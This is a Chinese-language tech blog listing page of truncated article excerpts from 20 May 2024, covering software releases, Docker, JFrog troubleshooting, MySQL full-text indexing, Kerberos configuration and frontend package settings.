MQTTX 1.9.10 版本現已發佈。本次更新帶來了重要的 Faker.js 升級、對連接斷開和訂閱問題的深度診斷,並增強了 CLI 與 UI 的多項功能。此次更新旨在簡化用戶操作流程,並提升問題排查效率。 點擊此處下載最新版本:htt

原創 2024-05-20 22:10:05

Docker on Centos-docker-compose

1、查看網絡 docker network ls docker network inspect $container_name 2、docker-compose微服務庫擴容 前提:application.yml配置文件要做相應調整 dock

原創 2024-05-20 11:27:29

一鍵自動化博客發佈工具,用過的人都說好(騰訊雲篇)

之前說過blog-auto-publishing-tools的實現方式是連到現有的瀏覽器中,而不是使用內置的瀏覽器。 其中一個很大程度的原因是像騰訊雲這種博客發佈平臺幾乎每天都需要重新登錄一次,登錄還需要手機掃碼。所以自動化實現起來非常複雜

原創 2024-05-20 21:38:29

Gen AI 連接非結構化數據,Unstructured Data Meetup 第二場官宣杭州!

定了!6 月 15 日,備受硅谷開發者喜愛的 Unstructured Data Meetup 第二場將在杭州舉辦! 衆所周知,AI 三要素包括:算力、算法和數據。數據的價值愈發凸顯,而其中非結構化數據更是備受關注。IDC 預測,到 202

原創 2024-05-20 21:25:07

別再發郵件了,必須在開源之夏後臺申請,50%的人竟然都沒有報名成功!

引言 近期我們注意到很多學生朋友通過郵件嚮導師申請報名,請注意!!!​這是無效的,請必須通過“開源之夏”官方後臺申請報名,請仔細參考這篇【報名攻略】 所以,我們特此舉辦這次宣講會,目的是向所有感興趣的學生詳細介紹Apache Dolphin

原創 2024-05-20 21:21:54

PDManer [元數建模]-v4.9.0 發佈:一款簡單好用的數據庫建模平臺

特別說明 平臺公雲版及企業私雲版已經發布,增加多人團隊協作支持,點擊這裏瞭解 [PDManer元數建模-v4],歷時五年,持續升級,工匠精神,做一款簡單好用的數據庫建模平臺。 元數建模平臺,使用React+Electron+Java技

原創 2024-05-20 11:36:32

PDManer [元數建模]-v4.7.0 發佈:一款簡單好用的數據庫建模平臺

特別說明 平臺公雲版及企業私雲版已經發布,增加多人團隊協作支持,點擊這裏瞭解 [PDManer元數建模-v4],歷時五年,持續升級,工匠精神,做一款簡單好用的數據庫建模平臺。 元數建模平臺,使用React+Electron+Java技

原創 2024-05-20 11:36:29

PDManer [元數建模]-v4.9.2 發佈:一款簡單好用的數據庫建模平臺

特別說明 平臺公雲版及企業私雲版已經發布,增加多人團隊協作支持,點擊這裏瞭解 [PDManer元數建模-v4],歷時五年,持續升級,工匠精神,做一款簡單好用的數據庫建模平臺。 元數建模平臺,使用React+Electron+Java技

原創 2024-05-20 11:36:28

PDManer [元數建模]-v4.8.0 發佈:一款簡單好用的數據庫建模平臺

特別說明 平臺公雲版及企業私雲版已經發布,增加多人團隊協作支持,點擊這裏瞭解 [PDManer元數建模-v4],歷時五年,持續升級,工匠精神,做一款簡單好用的數據庫建模平臺。 元數建模平臺,使用React+Electron+Java技

原創 2024-05-20 11:36:27

Jfrog實操手冊-Trouble Shooting-PKIX path building failed

1、Jenkins持續集成 配置Artifactory異常(需安裝Artifactory插件) 系統管理--系統設置--Artifactory An error occurred while connecting to JFrog Ar

原創 2024-05-20 11:27:30

MySQL全文索引源碼剖析之Insert語句執行過程

本文分享自華爲雲社區《MySQL全文索引源碼剖析之Insert語句執行過程》 ,作者:GaussDB 數據庫。 1. 背景介紹 全文索引是信息檢索領域的一種常用的技術手段,用於全文搜索問題,即根據單詞,搜索包含該單詞的文檔,比如在瀏覽器

原創 2024-05-20 10:59:15

CDH配置Kerberos和Sentry詳解

1.安全之Kerberos安全認證 1 Kerberos概述 1.1 什麼是Kerberos Kerberos是一種計算機網絡授權協議,用來在非安全網絡中,對個人通信以安全的手段進行身份認證。這個詞又指麻省理工學院爲這個協議開發的一套計算

原創 2024-05-20 21:36:31

年薪百萬的程序員都在用的摸魚方式……

隨着信息技術的不斷髮展,許多傳統的工作流程正在向自動化方向迅速轉變。在過去,開發人員在完成代碼編寫後,需要通過手動執行一系列操作來將代碼部署到生產環境中。 這看似簡單,但在實際操作過程中,不僅容易出現各種人爲失誤,還會消耗開發人員大量的時

原創 2024-05-20 14:05:33

常用第三方庫的package.json入口配置

react@^17 內部含有 umd和commonjs的包,沒有esm。只提供了main字段,並沒有browser字段。提供了browserify 配置。 總結:構建時需要特殊處理,不能按照統一規則處理。 react-dom@^17 內

原創 2024-05-20 13:41:31

MFC擴展庫BCGControlBar Pro v34.1新版亮點:日曆和計劃表等功能升級

BCGControlBar庫擁有500多個經過全面設計、測試和充分記錄的MFC擴展類。 我們的組件可以輕鬆地集成到您的應用程序中,併爲您節省數百個開發和調試時間。 BCGControlBar專業版 v34.1已正式發佈了,這個版本包含了對W

原創 2024-05-20 12:20:52